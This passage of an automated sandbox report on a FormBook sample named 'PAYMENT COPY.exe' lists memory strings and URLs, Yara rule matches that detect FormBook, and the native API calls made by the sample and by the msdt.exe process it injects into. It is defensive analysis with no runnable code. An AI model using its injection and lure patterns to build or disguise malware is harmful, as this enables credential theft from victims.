          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
          Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
          Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
          Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
          Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.8dq98.com/enter/index.html
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00404EA0
          Source: PAYMENT COPY.exe, 00000001.00000002.341477540.0000000000A0A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: PAYMENT COPY.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: PAYMENT COPY.exe
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_004181D0 NtCreateFile,2_2_004181D0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00418280 NtReadFile,2_2_00418280
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00418300 NtClose,2_2_00418300
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_004183B0 NtAllocateVirtualMemory,2_2_004183B0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041827A NtReadFile,2_2_0041827A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_004183AA NtAllocateVirtualMemory,2_2_004183AA
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B198F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00B198F0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19860 NtQuerySystemInformation,LdrInitializeThunk,2_2_00B19860
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19840 NtDelayExecution,LdrInitializeThunk,2_2_00B19840
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B199A0 NtCreateSection,LdrInitializeThunk,2_2_00B199A0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00B19910
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19A20 NtResumeThread,LdrInitializeThunk,2_2_00B19A20
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00B19A00
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19A50 NtCreateFile,LdrInitializeThunk,2_2_00B19A50
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B195D0 NtClose,LdrInitializeThunk,2_2_00B195D0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19540 NtReadFile,LdrInitializeThunk,2_2_00B19540
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B196E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00B196E0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00B19660
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B197A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00B197A0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19780 NtMapViewOfSection,LdrInitializeThunk,2_2_00B19780
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19FE0 NtCreateMutant,LdrInitializeThunk,2_2_00B19FE0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19710 NtQueryInformationToken,LdrInitializeThunk,2_2_00B19710
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B198A0 NtWriteVirtualMemory,2_2_00B198A0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19820 NtEnumerateKey,2_2_00B19820
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1B040 NtSuspendThread,2_2_00B1B040
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B199D0 NtCreateProcessEx,2_2_00B199D0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19950 NtQueueApcThread,2_2_00B19950
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19A80 NtOpenDirectoryObject,2_2_00B19A80
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19A10 NtQuerySection,2_2_00B19A10
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1A3B0 NtGetContextThread,2_2_00B1A3B0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19B00 NtSetValueKey,2_2_00B19B00
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B195F0 NtQueryInformationFile,2_2_00B195F0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1AD30 NtSetContextThread,2_2_00B1AD30
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19520 NtWaitForSingleObject,2_2_00B19520
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19560 NtWriteFile,2_2_00B19560
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B196D0 NtCreateKey,2_2_00B196D0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19610 NtEnumerateValueKey,2_2_00B19610
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19670 NtQueryInformationProcess,2_2_00B19670
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19650 NtQueryValueKey,2_2_00B19650
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19730 NtQueryVirtualMemory,2_2_00B19730
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1A710 NtOpenProcessToken,2_2_00B1A710
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19770 NtSetInformationFile,2_2_00B19770
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1A770 NtOpenThread,2_2_00B1A770
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19760 NtOpenProcess,2_2_00B19760
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_004181D0 NtCreateFile,2_1_004181D0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_00418280 NtReadFile,2_1_00418280
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_00418300 NtClose,2_1_00418300
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_004183B0 NtAllocateVirtualMemory,2_1_004183B0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041827A NtReadFile,2_1_0041827A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_004183AA NtAllocateVirtualMemory,2_1_004183AA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D195D0 NtClose,LdrInitializeThunk,5_2_04D195D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19540 NtReadFile,LdrInitializeThunk,5_2_04D19540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D196D0 NtCreateKey,LdrInitializeThunk,5_2_04D196D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D196E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04D196E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19650 NtQueryValueKey,LdrInitializeThunk,5_2_04D19650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04D19660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19FE0 NtCreateMutant,LdrInitializeThunk,5_2_04D19FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19780 NtMapViewOfSection,LdrInitializeThunk,5_2_04D19780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19710 NtQueryInformationToken,LdrInitializeThunk,5_2_04D19710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19840 NtDelayExecution,LdrInitializeThunk,5_2_04D19840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19860 NtQuerySystemInformation,LdrInitializeThunk,5_2_04D19860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D199A0 NtCreateSection,LdrInitializeThunk,5_2_04D199A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_04D19910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19A50 NtCreateFile,LdrInitializeThunk,5_2_04D19A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D195F0 NtQueryInformationFile,5_2_04D195F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19560 NtWriteFile,5_2_04D19560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1AD30 NtSetContextThread,5_2_04D1AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19520 NtWaitForSingleObject,5_2_04D19520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19670 NtQueryInformationProcess,5_2_04D19670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19610 NtEnumerateValueKey,5_2_04D19610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D197A0 NtUnmapViewOfSection,5_2_04D197A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1A770 NtOpenThread,5_2_04D1A770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19770 NtSetInformationFile,5_2_04D19770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19760 NtOpenProcess,5_2_04D19760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1A710 NtOpenProcessToken,5_2_04D1A710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19730 NtQueryVirtualMemory,5_2_04D19730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D198F0 NtReadVirtualMemory,5_2_04D198F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D198A0 NtWriteVirtualMemory,5_2_04D198A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1B040 NtSuspendThread,5_2_04D1B040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19820 NtEnumerateKey,5_2_04D19820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D199D0 NtCreateProcessEx,5_2_04D199D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19950 NtQueueApcThread,5_2_04D19950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19A80 NtOpenDirectoryObject,5_2_04D19A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19A10 NtQuerySection,5_2_04D19A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19A00 NtProtectVirtualMemory,5_2_04D19A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19A20 NtResumeThread,5_2_04D19A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1A3B0 NtGetContextThread,5_2_04D1A3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19B00 NtSetValueKey,5_2_04D19B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE81D0 NtCreateFile,5_2_00AE81D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE8280 NtReadFile,5_2_00AE8280
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE83B0 NtAllocateVirtualMemory,5_2_00AE83B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE8300 NtClose,5_2_00AE8300
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE827A NtReadFile,5_2_00AE827A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE83AA NtAllocateVirtualMemory,5_2_00AE83AA
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_0040314A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004046A71_2_004046A7
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041C04E2_2_0041C04E
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041C86A2_2_0041C86A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041B9EA2_2_0041B9EA
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00408C6B2_2_00408C6B
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00408C702_2_00408C70
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041BDDE2_2_0041BDDE
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041B6E12_2_0041B6E1
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B020A02_2_00B020A0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA20A82_2_00BA20A8
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEB0902_2_00AEB090
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B910022_2_00B91002
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF41202_2_00AF4120
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADF9002_2_00ADF900
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA22AE2_2_00BA22AE
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0EBB02_2_00B0EBB0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9DBD22_2_00B9DBD2
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA2B282_2_00BA2B28
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE841F2_2_00AE841F
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B025812_2_00B02581
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AED5E02_2_00AED5E0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD0D202_2_00AD0D20
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA2D072_2_00BA2D07
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA1D552_2_00BA1D55
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA2EF72_2_00BA2EF7
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF6E302_2_00AF6E30
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA1FF12_2_00BA1FF1
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041C04E2_1_0041C04E
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041C86A2_1_0041C86A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_004010302_1_00401030
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041B9EA2_1_0041B9EA
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_00408C6B2_1_00408C6B
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_00408C702_1_00408C70
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9D4665_2_04D9D466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE841F5_2_04CE841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA25DD5_2_04DA25DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CED5E05_2_04CED5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D025815_2_04D02581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA1D555_2_04DA1D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA2D075_2_04DA2D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD0D205_2_04CD0D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA2EF75_2_04DA2EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9D6165_2_04D9D616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF6E305_2_04CF6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DADFCE5_2_04DADFCE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA1FF15_2_04DA1FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA28EC5_2_04DA28EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEB0905_2_04CEB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D020A05_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA20A85_2_04DA20A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D910025_2_04D91002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DAE8245_2_04DAE824
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDF9005_2_04CDF900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF41205_2_04CF4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA22AE5_2_04DA22AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D903DA5_2_04D903DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9DBD25_2_04D9DBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0EBB05_2_04D0EBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA2B285_2_04DA2B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEC86A5_2_00AEC86A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AD8C6B5_2_00AD8C6B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AD8C705_2_00AD8C70
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AD2D875_2_00AD2D87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AD2D905_2_00AD2D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEBDDB5_2_00AEBDDB
